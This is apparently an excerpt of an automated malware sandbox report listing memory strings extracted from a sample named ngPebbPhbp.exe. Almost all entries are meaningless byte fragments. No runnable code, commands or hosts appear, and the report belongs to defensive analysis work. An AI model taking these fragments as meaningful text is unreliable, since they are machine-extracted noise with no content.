                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pwmemstr_b9051bf6-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$$pwmemstr_0a37720d-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $)mj,memstr_394b8d4c-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ x&memstr_881b9d24-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$(pjmemstr_c3974008-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$l;t$memstr_b27cb9df-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$hpvmemstr_6ec6bc9e-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$\pwvmemstr_5a9bf1a7-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;|$8}+memstr_1a288a59-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i;|$8}+memstr_0fc21994-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$xpjmemstr_ceb19b4d-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$xphmemstr_ec88c74b-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g;|$<memstr_111ab2dd-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ig;|$<memstr_2df8f133-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p3mspmemstr_3ddce68d-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =`)mvmemstr_4e5b4a53-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +g<+w@memstr_eb9a4e56-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$tpvh>memstr_701cd57f-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g4;g\memstr_623a17dc-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$@pvhmemstr_e7303fac-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$|pvhkmemstr_96828722-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$(pvhmemstr_56cb8e3d-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$4jhmemstr_261d4197-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$$vqmemstr_c093ddbf-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0ft9memstr_26bb2d54-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u\pprjmemstr_1f204956-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <jjrjmemstr_26b6b3f0-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]jjrjmemstr_b7362848-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: djjrjmemstr_5d86ec73-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {,9c0~[memstr_8a380cb0-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c0_^[memstr_4fb04e57-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j]xf;memstr_527e0c32-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tj\xf;umemstr_fb35553b-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t*j[xmemstr_5c30fa71-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @_^[]memstr_4f3a7dda-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jhx_^[memstr_966ec868-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4ff9>tmemstr_7bbe96ee-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jwyf;memstr_d7125efa-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: af99tmemstr_845dac99-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svwj0_jf+memstr_08846c0c-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j}^f;memstr_9ac6f405-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j}xf;memstr_67f3ffb8-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n;s|samemstr_62a062ff-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$dtnmemstr_71111c9a-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9d$<t]memstr_7a360403-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$ rqrmemstr_fa43fb4e-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$$p3memstr_15bf5f51-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$ pv3memstr_578c9d30-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$dtmmemstr_8626f516-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$$qjmemstr_2bbb5304-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #muf9memstr_f7544af9-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j\^f90ujjmemstr_39a88ad3-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f90u;jmemstr_90d52313-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >_^[]memstr_45c94236-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$$vwhmemstr_44d8c219-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$@pvmemstr_45edc56d-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j%yf9memstr_50294092-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j\yf9memstr_9654111a-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$pvsmemstr_4c48702c-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l$lhpmemstr_290b74aa-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwdt[memstr_ede3e1fc-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wyvjsmemstr_95788fc7-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4pvmemstr_18c92e97-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j+yj.memstr_e7e33d6f-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~jexf9memstr_773147ef-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >jeyf;memstr_0a0268d8-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t j-_f;memstr_3e6ca9d0-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _j+y3memstr_e30613bc-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =h#mvtomemstr_64f5bdf4-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =e#mufmemstr_ac2a55c6-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4svw3memstr_2a672b7c-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4jspvmemstr_a4b07c82-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$$spvmemstr_74750637-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: acting anxv.pptmemstr_19cab26d-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ( wj(,wjmemstr_27ea0c43-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,dwj,pwjmemstr_76c076a6-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0hwj0twjmemstr_1c2f9c29-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |8xjarbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptromemstr_0de08564-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /3:3b3f3l3p3v3`3j3t3memstr_e8d07c68-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4%4/494c4n4v4z4`4d4j4t4~4memstr_075a2ae1-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5%5)5/53595c5m5w5b5j5n5t5x5~5memstr_81360ee1-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6&61696=6c6g6m6w6a6k6v6~6memstr_c015117e-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7&707:7e7m7q7w7[7a7k7u7memstr_6db3bd7f-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8 8&8*808:8d8n8y8a8e8k8o8u8memstr_412b3248-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9(90949:9>9d9n9x9b9m9u9y9memstr_6789d1f8-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :':1:<:d:h:n:r:x:b:l:v:memstr_b0a3b149-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;!;';1;;;e;p;x;\;b;f;l;v;memstr_9ab808ed-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <'<+<1<5<;<e<o<y<d<l<p<v<z<memstr_061a582e-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =(=3=;=?=e=i=o=y=c=m=x=memstr_69ddb517-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >(>2><>g>o>s>y>]>c>m>w>memstr_c90d6ae7-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?"?(?,?2?<?f?p?[?c?g?m?q?w?memstr_f02a188e-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0*02060<0@0f0p0z0d0o0w0{0memstr_322db1b9-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1)131>1f1j1p1t1z1d1n1x1memstr_19ab7d01-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2#2)232=2g2r2z2^2d2h2n2x2memstr_347e12ec-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3!3)3-33373=3g3q3[3f3n3r3x3|3memstr_b156ac8e-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4 4*454=4a4g4k4q4[4e4o4z4memstr_d899dc40-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5 5*545>5i5q5u5[5_5e5o5y5memstr_86404415-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6 6$6*6.646>6h6r6]6e6i6o6s6y6memstr_2bf5d672-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7!7,74787>7b7h7r7\7f7q7y7}7memstr_eb206423-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8!8+858@8h8l8r8v8\8f8p8z8memstr_94045ba5-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9!9%9+959?9i9t9\9`9f9j9p9z9memstr_34ee5909-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :#:+:/:5:9:?:i:s:]:h:p:t:z:~:memstr_205f819a-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;";,;7;?;c;i;m;s;];g;q;|;memstr_008fdcc7-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <"<,<6<@<k<s<w<]<a<g<q<{<memstr_9e4646d3-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ="=&=,=0=6=@=j=t=_=g=k=q=u={=memstr_af200e4f-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >#>.>6>:>@>d>j>t>^>h>s>{>memstr_2785f33c-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?#?-?7?b?j?n?t?x?^?h?r?|?memstr_2064e8d5-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0#0'0-070a0k0v0^0b0h0l0r0|0memstr_1249b801-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1%1-11171;1a1k1u1_1j1r1v1|1memstr_d8e327c9-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2$2.292a2e2k2o2u2_2i2s2~2memstr_71aec8ea-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3$3.383b3m3u3y3_3c3i3s3}3memstr_ef9397f6-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4$4(4.42484b4l4v4a4i4m4s4w4}4memstr_305e74d6-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5%50585<5b5f5l5v5`5j5u5}5memstr_e7bad43a-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6%6/696d6l6p6v6z6`6j6t6~6memstr_bbe7d86e-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7%7)7/797c7m7x7`7d7j7n7t7~7memstr_7037bc67-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8'8/83898=8c8m8w8a8l8t8x8~8memstr_46f19e29-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9&909;9c9g9m9q9w9a9k9u9memstr_eab55a96-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: : :&:0:::d:o:w:[:a:e:k:u:memstr_ef1e29fb-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;&;*;0;4;:;d;n;x;c;k;o;u;y;memstr_955b38e1-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <'<2<:<><d<h<n<x<b<l<w<memstr_d8c279bc-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ='=1=;=f=n=r=x=\=b=l=v=memstr_763a7227-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >!>'>+>1>;>e>o>z>b>f>l>p>v>memstr_a810140d-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?)?1?5?;???e?o?y?c?n?v?z?memstr_84d3b348-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0(020=0e0i0o0s0y0c0m0w0memstr_40b55d42-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1"1(121<1f1q1y1]1c1g1m1w1memstr_a8237a83-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2 2(2,22262<2f2p2z2e2m2q2w2{2memstr_f0476285-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3)343<3@3f3j3p3z3d3n3y3memstr_6b1956a4-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4)434=4h4p4t4z4^4d4n4x4memstr_53dbfb5c-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5#5)5-535=5g5q5\5d5h5n5r5x5memstr_2d4b09c9-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6 6+63676=6a6g6q6[6e6p6x6|6memstr_c760d88c-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7 7*747?7g7k7q7u7[7e7o7y7memstr_67d24a94-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8 8$8*848>8h8s8[8_8e8i8o8y8memstr_812f6908-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9"9*9.94989>9h9r9\9g9o9s9y9}9memstr_dc011d11-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :!:+:6:>:b:h:l:r:\:f:p:{:memstr_5792d373-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;!;+;5;?;j;r;v;\;`;f;p;z;memstr_173daed4-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <!<%<+</<5<?<i<s<^<f<j<p<t<z<memstr_3f42bde2-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ="=-=5=9=?=c=i=s=]=g=r=z=~=memstr_1508cd50-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >">,>6>a>i>m>s>w>]>g>q>{>memstr_008a1a6f-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?"?&?,?6?@?j?u?]?a?g?k?q?{?memstr_46c9c109-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0$0,00060:0@0j0t0^0i0q0u0{0memstr_ae0c5c89-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1#1-181@1d1j1n1t1^1h1r1}1memstr_93520cc5-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2#2-272a2l2t2x2^2b2h2r2|2memstr_8f84a185-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3#3'3-31373a3k3u3`3h3l3r3v3|3memstr_595341ca-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4$4/474;4a4e4k4u4_4i4t4|4memstr_892bcde6-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5$5.585c5k5o5u5y5_5i5s5}5memstr_11ddfb28-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6$6(6.686b6l6w6_6c6i6m6s6}6memstr_266ba5aa-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7&7.72787<7b7l7v7`7k7s7w7}7memstr_73a1ca37-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8%8/8:8b8f8l8p8v8`8j8t8memstr_902807b1-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9%9/999c9n9v9z9`9d9j9t9~9memstr_5e1ceeb8-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :%:):/:3:9:c:m:w:b:j:n:t:x:~:memstr_4ff0eace-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;&;1;9;=;c;g;m;w;a;k;v;~;memstr_c13434fd-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <&<0<:<e<m<q<w<[<a<k<u<memstr_514b4e21-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: = =&=*=0=:=d=n=y=a=e=k=o=u=memstr_2a25c7c7-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >(>0>4>:>>>d>n>x>b>m>u>y>memstr_a896c27c-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?'?1?<?d?h?n?r?x?b?l?v?memstr_028502d2-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0!0'010;0e0p0x0\0b0f0l0v0memstr_78362a12-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1'1+11151;1e1o1y1d1l1p1v1z1memstr_d8fed597-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2(232;2?2e2i2o2y2c2m2x2memstr_8ab03aba-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3(323<3g3o3s3y3]3c3m3w3memstr_cacefe5f-5
